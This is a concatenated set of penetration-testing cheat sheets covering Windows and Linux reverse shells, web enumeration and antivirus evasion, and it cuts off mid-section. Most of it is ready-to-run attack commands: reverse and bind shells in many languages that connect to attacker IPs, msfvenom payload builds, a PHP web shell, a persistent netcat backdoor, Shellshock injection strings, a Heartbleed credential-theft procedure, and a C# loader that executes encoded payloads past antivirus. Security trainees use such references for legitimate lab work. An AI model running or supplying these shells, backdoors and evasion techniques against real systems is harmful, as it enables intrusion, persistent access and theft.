102 |     $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()
103 |     
104 |     
105 | ### Powercat 
106 | Powershell version of netcat 
107 | [Powercat](https://github.com/besimorhino/powercat)  
108 | 
109 | 
110 | ### Socat   
111 | [reference](https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/)   
112 | cmd.exe,pipes
113 | 
114 | ### Python  
115 | Python2: 
116 | 
117 |     C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 53)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
118 | 
119 | Python3:    
120 | 
121 |     python.exe -c "import socket,os,threading,subprocess as sp;p=sp.Popen(['cmd.exe'],stdin=sp.PIPE,stdout=sp.PIPE,stderr=sp.STDOUT);s=socket.socket();s.connect(('10.0.0.1',4242));threading.Thread(target=exec,args=(\"while(True):o=os.read(p.stdout.fileno(),1024);s.send(o)\",globals()),daemon=True).start();threading.Thread(target=exec,args=(\"while(True):i=s.recv(1024);os.write(p.stdin.fileno(),i)\",globals())).start()"   
122 |     
123 | ### Perl 
124 | 
125 |     perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:53");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'  
126 | ### Ruby     
127 | 
128 |     ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'    
129 |     
130 | ## Antivirus Evasion  
131 | [PHP payload encoder](https://www.gaijin.at/en/tools/php-obfuscator#result)        
132 | [Example - obfuscating payload to get a reverse shell on Windows](https://medium.com/@defsecone/evading-windows-defender-using-obfuscation-techniques-2494b2924807)          
133 | 
134 | 
135 | ## Resources  
136 | 
137 | [Tiberius Reverse Shells](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/reverse-shells.rst)     
138 | [Payload All the Things Reverse Shells](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)          
139 | [Reverse Shell Cheatsheet](https://github.com/d4t4s3c/Reverse-Shell-Cheat-Sheet)           
140 | 


--------------------------------------------------------------------------------
/Unix/Linux_Shells.md:
--------------------------------------------------------------------------------
  1 | # Shells 
  2 | ## Contents
  3 | - [Shells](#shells)
  4 |   * [Contents](#contents)
  5 |   * [Web shells](#web-shells)
  6 |   * [Debugging Shells](#debugging-shells)
  7 |   * [Reverse shell commands](#reverse-shell-commands)
  8 |     + [Bash](#bash)
  9 |     + [netcat](#netcat)
 10 |     + [other languages](#other-languages)
 11 |   * [Msfvenom Payloads](#msfvenom-payloads)
 12 |   * [Upgrading to a pseudo terminal / TTY](#upgrading-to-a-pseudo-terminal---tty)
 13 | 
 14 | ## Web shells 
 15 | [phpbash web shell](https://github.com/Arrexel/phpbash)  
 16 | [pentest monkey php shell](https://github.com/pentestmonkey/php-reverse-shell)  
 17 | [p0wney web shell](https://github.com/flozz/p0wny-shell)  
 18 | [white winter wolf web shell](https://github.com/WhiteWinterWolf/wwwolf-php-webshell)  
 19 | [collection of PHP webshells](https://github.com/JohnTroony/php-webshells/tree/master/Collection)    
 20 | /usr/share/seclists/Web-Shells    
 21 | 
 22 |     <?php if(isset($_GET[0])){echo $_GE[0]($_GET[1]) } ? >     
 23 | 
 24 | ## Debugging Shells   
 25 | executing a command and no response - maybe the command is redirecting to stderr not stdout?
 26 | 2>&1
 27 | Check for versions / path variables  
 28 | No path variable? Need absolute path 
 29 | 
 30 |     /bin/bash -c 'id'   
 31 | 
 32 | ## Reverse shell commands  
 33 | ### Bash     
 34 | requires /dev/tcp support, primarily found in RedHat/Debian distros:          
 35 | One bash version (compromised account's shell must be bash; does not work via www-data):  
 36 | 
 37 |     bash -i >& /dev/tcp/10.6.85.85/4444 0>&1           
 38 | Two bash version (safer, since parent shell can be anything):    
 39 | 
 40 |     bash -c 'bash -i >& /dev/tcp/172.17.0.2/1337 0>&1'      
 41 | Don't forget to check with other shells : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh         
 42 | Bash UDP    
 43 | 
 44 |     sh -i >& /dev/udp/10.0.0.1/4444 0>&1     
 45 |     nc -u -lvp 4444    #listener        
 46 | ### netcat  
 47 | nc w/ -e (traditional):  
 48 | 
 49 |     rlwrap nc -e /bin/sh 172.16.5.1 4242   
 50 |     
 51 |     -e /bin/sh 
 52 |     -e /bin/bash
 53 |     -e /bin/zsh
 54 |     -e /bin/ash
 55 |     
 56 | nc openbsd (no -e):    
 57 | 
 58 |     rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.6.85.85 53 >/tmp/f    
 59 |     
 60 | Persistent netcat backdoor using a while loop or nohup:  
 61 | 
 62 |     while [1 ]; do echo "Started"; nc -l -p 443 -e /bin/sh; done     #goes away if user logs out, make persistent using nohup     
 63 |     no hup ./listener.sh &    #listener.sh: above line. Make a process keep running, ignores logout signal 
 64 |     
 65 | ### other languages  
 66 | Python: 
 67 | [Python PTY Shells](https://github.com/infodox/python-pty-shells/)     
 68 | 
 69 |     python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' 
 70 |     
 71 | Python ipv6:
 72 | 
 73 |     python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'     
 74 |   
 75 | PHP            
 76 |     
 77 |     php -r '$sock=fsockopen("10.6.85.85",4444);exec("/bin/sh -i <&3 >&3 2>&3");'     
 78 |     php -r '$sock=fsockopen("10.0.0.1",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
 79 |     php -r '$sock=fsockopen("10.0.0.1",4444);`/bin/sh -i <&3 >&3 2>&3`;'
 80 |     php -r '$sock=fsockopen("10.0.0.1",4444);system("/bin/sh -i <&3 >&3 2>&3");'
 81 |     php -r '$sock=fsockopen("10.0.0.1",4444);passthru("/bin/sh -i <&3 >&3 2>&3");'
 82 |     php -r '$sock=fsockopen("10.0.0.1",4444);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
 83 | 
 84 | 
 85 | Perl 
 86 | 
 87 |     perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 88 |  
 89 | Ruby 
 90 | 
 91 |     ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'    
 92 |     ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'     
 93 |     ruby -rsocket -e'exit if fork;c=TCPSocket.new("10.0.0.1","4444");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'       
 94 |     
 95 |     
 96 | Golang 
 97 | 
 98 |     echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 99 | 
100 | AWK
101 | 
102 |     awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
103 |     
104 | [Tiberius Reverse Shells](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/reverse-shells.rst) 
105 | 
106 | [Payload All the Things Reverse Shells](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) 
107 | 
108 | [Reverse Shell Cheatsheet](https://github.com/d4t4s3c/Reverse-Shell-Cheat-Sheet)  
109 | 
110 | [Reverse and Bind Shells with Socat](https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/)
111 | 
112 | ## Msfvenom Payloads 
113 | [Reference](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/)    
114 | 
115 |     msfvenom -l payloads      #list payloads    
116 |     msfvenom -l encoders      #list encoders 
117 |     msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf	
118 |     msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
119 |     msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
120 |     msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
121 |    
122 | PHP   
123 | 
124 |     msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
125 |     cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php   
126 |     target $ php shell.php    
127 | Python    
128 | 
129 |     msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.16.192 LPORT=4444 -f raw     
130 |     target$ python3 
131 |     target$ [paste payload]      
132 | ### Socat        
133 | [Socat Linux x64 Static Binary](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)                      
134 | 
135 |     attacker $ socat file:`tty`,raw,echo=0 TCP-L:4444                     
136 |     victim $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444           
137 | 
138 |     user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4444               
139 | ### OpenSSL 
140 | 
141 |     attackerk$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes      
142 |     attacker$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
143 |     #or
144 |     attacker$ ncat --ssl -vv -l -p 4242
145 | 
146 |     victim$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4444 > /tmp/s; rm /tmp/s 
147 | 
148 | ## Upgrading to a pseudo terminal / TTY     
149 | [Reference](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/)  
150 | [What Happens in a Shell Upgrade?](https://www.youtube.com/watch?v=DqE6DxqJg8Q)       
151 | 
152 |     python -c 'import pty;pty.spawn("/bin/bash")' 
153 |     echo os.system('/bin/bash')
154 |     /bin/sh -i  
155 |     script /dev/null -c bash      #create new pty owned by current user, fixed in newer versions of screen        
156 |     
157 |     SHELL=/bin/bash script -q /dev/null        Ctrl-Z        stty raw -echo        fg    reset    xterm
158 |     
159 |     Can you upload a [socat static binary](https://github.com/andrew-d/static-binaries)? 
160 |     
161 |     vi -> :sh or :!UNIX_command
162 |     perl —e 'exec "/bin/sh";' 
163 |     perl: exec "/bin/sh"; 
164 |     ruby: exec "/bin/sh" 
165 |     lua: os.execute('/bin/sh') 
166 |     
167 | ## Restricted Shell Escapes        
168 | Check [GTFOBins](https://gtfobins.github.io/), [HackTricks - Escaping from Jails](https://book.hacktricks.xyz/linux-hardening/privilege-escalation/escaping-from-limited-bash)                    
169 | Try commands like: ls, cd, pwd, echo        
170 | To to identify restricted shell type / software       
171 | Try:    
172 | 
173 |     $(whoami) 
174 |     ${whoami}   
175 | Vim Escapes    
176 | 
177 |     :!/bin/sh
178 |     :shell
179 |     :set shell=/bin/sh  
180 | Pagers 
181 | 
182 |     !/bin/sh
183 |     !/bin/bash
184 |     !bash 
185 | SSH    
186 | 
187 |     ssh user@IP -t "bash --noprofile"
188 |     ssh user@IP -t "/bin/sh"


--------------------------------------------------------------------------------
/Web/README.md:
--------------------------------------------------------------------------------
  1 | # Web Enum Quick Reference  
  2 | ## Contents 
  3 | - [Web Enum Quick Reference](#web-enum-quick-reference)
  4 |   * [Contents](#contents)
  5 |   * [HTTP and HTTPS Checklist](#http-and-https-checklist)
  6 |   * [Scan for sub directories and pages](#scan-for-sub-directories-and-pages)
  7 |     + [Wordlists](#wordlists)
  8 |     + [Scanning Tools](#scanning-tools)
  9 |     + [Curl](#curl)
 10 | - [Web app specific](#web-app-specific)
 11 | - [Login pages](#login-pages)
 12 | - [Shellshock and Heartbleed](#shellshock-and-heartbleed)
 13 |   * [Heartbleed](#heartbleed)
 14 |   * [Shellshock](#shellshock)
 15 | - [SSRF](#ssrf)
 16 | - [Resources](#resources)
 17 |   * [Cheat Sheets](#cheat-sheets)
 18 |   * [Further Reading](#further-reading)
 19 |   * [Sources](#sources)
 20 | 
 21 | ## HTTP and HTTPS Checklist   
 22 | - [ ] Scan page with Wappanalyzer FireFox add-on      
 23 | - [ ] Scan for sub directories and pages - admin pages?, login pages?, file upload?, user input fields?   
 24 | - [ ] Check for robots.txt, security.txt, sitemap.xml files      
 25 | - [ ] Test strength of encryption using nmap ssl-enum-ciphers script   
 26 | - [ ] Look for service name and version - searchsploit / google for exploits   
 27 | - [ ] Service specific scanners: wpscan, Joomscan        
 28 | - [ ] Admin page - access misconfigs, login?       
 29 | - [ ] Log in pages - guess default creds, admin:admin, admin:password   
 30 | - [ ] File upload pages - what types of files are accepted?, what checks are being implemented? is there a value you can change to include a file?     
 31 | - [ ] User input fields: SQL injection, cross site scripting   
 32 | - [ ] Intercept HTTP requests with Burp and examine    	
 33 | 
 34 | Reference: [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings)    
 35 | Firefox addons: script to add ons [here](https://github.com/mazen160/Firefox-Security-Toolkit)               
 36 | [Wappanalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/), [Foxy Proxy](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/) and [user agent switcher](https://addons.mozilla.org/en-US/firefox/addon/uaswitcher/)                 
 37 | [Pen Testing Web Checklist](https://pentestbook.six2dez.com/others/web-checklist)    
 38 | 
 39 | HTTP Status Codes     
 40 | 1xx - Informational    
 41 | 2xx - Success     
 42 | 3xx - Redirection     
 43 | 4xx - Client Error    
 44 | 5xx - Server Error   
 45 | ## Scan for sub directories and pages	
 46 | ### Wordlists 
 47 | Common wordlists to use for web directory scanning: 
 48 | 
 49 |     /usr/share/wordlists/dirb/common.txt
 50 |     /usr/share/wordlists/dirbuster/*.txt
 51 |     /usr/share/wordlists/wfuzz/general/*.txt
 52 |     /usr/share/seclists/Discovery/Web-Content/
 53 | 
 54 | Common wordlists to use for user enumeration scanning: 
 55 | 
 56 |     /usr/share/seclists/Usernames
 57 |     /usr/share/wordlists/dirbuster/apache-user-enum-2.0  
 58 |     
 59 | Create a wordlist with CeWL:   
 60 | 
 61 |     cewl http://www.site.org -w wordlist.txt    
 62 | 
 63 | CeWL sometimes misses directories so use these steps to create a dir list for CeWL to crawl:     
 64 | 
 65 |     feroxbuster -eknr --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.10 -o ferox.txt   
 66 |     cat ferox.txt | grep 200 | grep -v "png\|\.js" | cut -d "h" -f2-100 | sed "s/^/h/g" >> urls.txt          
 67 |     for url in $(cat urls.txt); do echo $url && cewl -d 5 $url >> temp_cewl.txt;done           
 68 |     cat temp_cewl.txt | sort -u >> cewl.txt && rm temp_cewl.txt    
 69 |     tr '[:upper:]' '[:lower:]' < cewl.txt > cewl_lower.txt
 70 |     cat cewl_lower.txt >> cewl.txt
 71 |     #then use the CeWL wordlist for password guessing   
 72 |     
 73 | ### Scanning Tools    
 74 | Nikto    
 75 | Gobuster / Dirb / Feroxbuster   
 76 | Ffuf /wfuzz: fuzzing tools      
 77 | [BFAC](https://github.com/mazen160/bfac): search for backup files    
 78 | 
 79 | Web Scanning:     
 80 | 
 81 |     nikto -h http://127.0.0.1:80/     
 82 | Page and Directory Fuzzing:    
 83 | 
 84 |     dirb http://127.0.0.1/   (default word list: common.txt)     
 85 |     gobuster dir -u http://127.0.0.1/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z     
 86 |     ffuf -w wordlist.txt -u https://example.org/FUZZ -mc all -c -v  
 87 |     ffuf -w wordlist.txt -u http://www.site.org/FUZZ -e .aspx,.html,.php,.txt    
 88 |     feroxbuster -u http://target.com -w /usr/share/dirb/wordlists/common.txt -d [recursion depth] -t [threads] -s [status codes] 
 89 | 
 90 |     whatweb http://target  
 91 |     wfuzz -c --hc=404 -R 2 -w /usr/share/dirb/wordlists/common.txt http://target/fuzz   
 92 |     
 93 |  Virtual Hosts (subdomains):   
 94 |  
 95 |     gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://site.com --append-domain             
 96 | 
 97 |     
 98 | ### Curl 
 99 | 
100 |     curl -v -X OPTIONS http://<targetip>/test/  
101 |     curl --upload-file <file name> -v --url <url> -0 --http1.0
102 |     
103 | Other Tools: 
104 |     Burp Suite         
105 |     OWASP Zap            
106 |     Cadaver                
107 | 	
108 | # Web app specific  
109 | See [CMS.md](https://github.com/lw8192/Red-Team-Rising/blob/main/Web/CMS.md)        
110 | 
111 | # Login pages   
112 | 	
113 | Default creds - admin: admin, admin:password, service specific default creds   
114 | Register a new user  
115 | Brute force log in [use hydra or Burp Suite](https://github.com/lw8192/Red-Team-Rising/blob/main/Exploitation/Cracking.md)    
116 | SQL injection  
117 | 
118 | # Shellshock and Heartbleed    
119 | ## Heartbleed   
120 | Bug in OpenSSL crypto software library. Allows an attacker to steal info normally protected by SSL/TLS encryption.      
121 | Testing: scan using nmap heartbleed script   
122 | 
123 |     nmap -p 443 -sV --script ssl-heartbleed www.site.org    
124 | Example: Exploit the Heartbleed vulnerability to steal the following from a vulnerable OpenSSL server's RAM: Username, Password, Cookie     
125 | RAM is unpredictable, so you may need to run heartbleed.py multiple times. Must use Firefox / HTTPS to browse to site, perform 2 logins - first login will be in RAM.    
126 | https://gist.github.com/eelsivart/10174134     
127 | Save a local copy of the RAM contents that are disclosed via heartbleed. By default, heartbleed.py will write dump.bin to the current directory.    
128 | 
129 |     heartbleed.py -f /home/user/dump.bin heartbleed.site.org | less     
130 |     strings /home/student/dump.bin    -> look for creds / cookie    
131 | 
132 | ## Shellshock   
133 | Bug in Bash shell itself incorrectly executing trailing commands when it imports a function definition stored in an enviroment variable. Commonly found in CGI-based webservers, which use user input to define enviromental variables.     
134 | Metasploit module or 34900.py ("Apache mod_cgi - 'Shellshock' Remote Command Injection")   
135 | Syntax: () { :; }   
136 | Manual test for CGI based webservers: 
137 |     
138 |     curl -x http://192.168.90.61:3128 -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" -L http://10.10.10.10/cgi-bin/status    
139 |     curl -A "() { ignored;}; echo; /bin/cat /etc/passwd" http://127.0.0.1/cgi-bin/netstat.cgi
140 | 
141 | Nmap script check:   
142 | 
143 |     nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.10   
144 | To exploit change vulnerable field in HTTP request (likely UAS) to a reverse shell command:        
145 |     
146 |     User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1     
147 | # SSRF   
148 | Server requests resource of behalf of the web client.    
149 | SSRF example using curl:    
150 | 
151 |     curl -v "https://site.org/get.php?logo=file://etc/hosts"    #local file reference   
152 | 	
153 | # Resources  
154 | 
155 | ## Cheat Sheets 
156 | [SQLi cheat sheet](https://guif.re/sqli)  
157 | [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/Glossary.html)    
158 | https://websec.ca/kb/sql_injection   
159 | https://pentestmonkey.net/category/cheat-sheet/sql-injection   
160 | https://sqlwiki.netspi.com/    
161 | https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/    
162 | 
163 | ## Further Reading 
164 | [OWASP Web App Testing Guide](https://owasp.org/www-project-web-security-testing-guide/stable/)    
165 | [Bypassing File Upload Restrictions ](http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html)      
166 | [Web vulnerabilities to gain access to the system - paper](https://www.exploit-db.com/papers/13017/)     
167 | 
168 | File Inclusion
169 | [RFI to LFI](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1) 
170 | 
171 | Basic SQLi 
172 | http://www.securityidiots.com/Web-Pentest/SQL-Injection/Part-1-Basic-of-SQL-for-SQLi.html     
173 | http://www.securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-SQLi.html       
174 | http://www.securityidiots.com/Web-Pentest/SQL-Injection/Part-3-Basic-of-SQL-for-SQLi.html      
175 | http://www.sqlinjection.net/login/    
176 | 
177 | ## Sources 
178 | https://fareedfauzi.gitbook.io/ctf-checklist-for-beginner/web 
179 | 


--------------------------------------------------------------------------------
/Windows/Windows_AV.md:
--------------------------------------------------------------------------------
  1 | # Anti Virus Bypass / Evasion   
  2 | ## Contents
  3 | - [Anti Virus Bypass / Evasion](#anti-virus-bypass---evasion)
  4 |   * [Contents](#contents)
  5 |   * [Techniques](#techniques)
  6 |     + [Targeting Processes to Evade Detection](#targeting-processes-to-evade-detection)
  7 |     + [IronPython](#ironpython)
  8 |   * [Tools](#tools)
  9 |     + [Chamelon](#chamelon)
 10 |     + [Veil Framework:](#veil-framework-)
 11 |     + [Shellter](#shellter)
 12 |     + [Sharpshooter](#sharpshooter)
 13 |     + [Donut:](#donut-)
 14 |     + [Vulcan](#vulcan)
 15 |     + [Scarecrow](#scarecrow)
 16 |     + [Sharpshooter](#sharpshooter-1)
 17 |   * [Commands](#commands)
 18 | - [Living Off the Land](#living-off-the-land)
 19 |   * [Use Microsoft .NET InstallUtil to Evade AppLocker](#use-microsoft-net-installutil-to-evade-applocker)
 20 | - [Resources](#resources)
 21 |   * [Cheat sheets](#cheat-sheets)
 22 |   * [Workshops](#workshops)
 23 |   * [Windows Internal Resources](#windows-internal-resources)
 24 |   * [Tools](#tools-1)
 25 |   * [Further Reading](#further-reading)
 26 |   * [Videos](#videos)
 27 |   * [Process Injection](#process-injection)
 28 |   
 29 | ## Techniques         
 30 | Modify malware to evade signature analysis, encode using obfuscation tools, leverage permitted tools (Living Off the Land)    
 31 | Use wrapper files to call static executables (such as nc)     
 32 | [AV Payloads](https://github.com/RoseSecurity/Anti-Virus-Evading-Payloads)     
 33 | 
 34 | ### Targeting Processes to Evade Detection     
 35 | Process Injection, Process Hollowing, Process Masquerading     
 36 | 
 37 | ### IronPython         
 38 | Execute obfuscated Python natively in a C# program, encode it as a variable then execute (no Python interpreter needed). Source: https://www.willhackforsushi.com/sec504/csharp_py.cs     
 39 | ~~~
 40 | // This is the excellent work of Chris Davis of Counter Hack
 41 | // Small edits by Joshua Wright for clarity
 42 | 
 43 | using System;
 44 | using System.Collections.Generic;
 45 | using System.Linq;
 46 | using System.Text;
 47 | using System.Threading.Tasks;
 48 | 
 49 | namespace csharp_py
 50 | {
 51 |     class Program
 52 |     {
 53 |         static void Main(string[] args)
 54 |         {
 55 |             // Create an IronPython engine to execute Python code
 56 |             Microsoft.Scripting.Hosting.ScriptEngine pythonEngine =
 57 |                 IronPython.Hosting.Python.CreateEngine();
 58 | 
 59 |             // Print the default search paths
 60 |             // You may need to manually add these paths to include the DLLs necessary for execution
 61 |             System.Console.Out.WriteLine("Search paths:");
 62 |             ICollection<string> searchPaths = pythonEngine.GetSearchPaths();
 63 |             foreach (string path in searchPaths)
 64 |             {
 65 |                 System.Console.Out.WriteLine(path);
 66 |             }
 67 |             System.Console.Out.WriteLine();
 68 | 
 69 |             // Now modify the search paths to include the directory
 70 |             // where the standard library has been installed
 71 |             searchPaths.Add(@"..\..\Lib");
 72 |             searchPaths.Add(@"..\Lib");
 73 |             searchPaths.Add(@".\Lib");
 74 |             pythonEngine.SetSearchPaths(searchPaths);
 75 | 
 76 |             // Execute the malicious Python coce
 77 |             // Replace the payload below with your own, possibly the output of msfvenom
 78 |             // msfvenom -p python/meterpreter/reverse_tcp LHOST=10.10.75.1
 79 |             Microsoft.Scripting.Hosting.ScriptSource pythonScript = pythonEngine.CreateScriptSourceFromString("exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('cAByAGkAbgB0ACgAJwByAGUAcABsAGEAYwBlACAAdABoAGkAcwAgAHAAcgBpAG4AdAAgAHMAdABhAHQAZQBtAGUAbgB0ACAAdwBpAHQAaAAgAHQAaABlACAAbQBzAGYAdgBlAG4AbwBtACAAcAB5AHQAaABvAG4AIABwAGEAeQBsAG8AYQBkACcAKQA=')[0]))");
 80 |             pythonScript.Execute();
 81 |         }
 82 |     }
 83 | }
 84 | ~~~
 85 | 
 86 | ## Tools     
 87 | ### Chamelon    
 88 | [Chameleon](https://github.com/klezVirus/chameleon): Powershell script obfuscator  
 89 | 
 90 | ### Veil Framework:
 91 | 
 92 | Install on Kali
 93 | 
 94 |     apt install veil
 95 |     /usr/share/veil/config/setup.sh --force --silent
 96 | 
 97 | Reference: https://github.com/Veil-Framework/Veil
 98 | 
 99 | ### Shellter
100 | 
101 | Source: https://www.shellterproject.com/download/
102 | 
103 |     apt install shellter
104 | 
105 | 
106 | ### Sharpshooter
107 | 
108 | Javascript Payload Stageless: 
109 | 
110 |     SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
111 | 
112 | Stageless HTA Payload: 
113 | 
114 |     SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
115 | 
116 | Staged VBS:
117 | 
118 |     SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
119 | 
120 | Reference: https://github.com/mdsecactivebreach/SharpShooter
121 | 
122 | ### Donut: 
123 | 
124 | Source: https://github.com/TheWover/donut
125 | 
126 | ### Vulcan
127 | 
128 | Source: https://github.com/praetorian-code/vulcan
129 | 
130 | 
131 | ### Scarecrow
132 | 
133 | Source: https://github.com/optiv/ScareCrow
134 | 
135 | In Kali: 
136 | 
137 |     sudo apt install golang
138 | 
139 |     go get github.com/fatih/color
140 |     go get github.com/yeka/zip
141 |     go get github.com/josephspurrier/goversioninfo
142 | 
143 |     go build ScareCrow.go
144 | 
145 |     ./ScareCrow
146 | 
147 | ### Sharpshooter
148 | [SharpShooter](https://github.com/mdsecactivebreach/SharpShooter)   
149 | 
150 | Javascript Payload Stageless:   
151 | 
